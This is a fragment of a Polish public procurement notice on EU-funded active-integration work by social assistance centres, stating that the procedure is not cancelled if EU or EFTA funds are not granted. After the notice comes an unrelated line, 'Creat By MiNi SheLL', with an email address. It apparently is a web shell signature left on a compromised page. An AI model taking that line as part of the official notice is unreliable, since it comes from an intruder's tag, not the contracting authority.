Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki            pomocy społecznej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com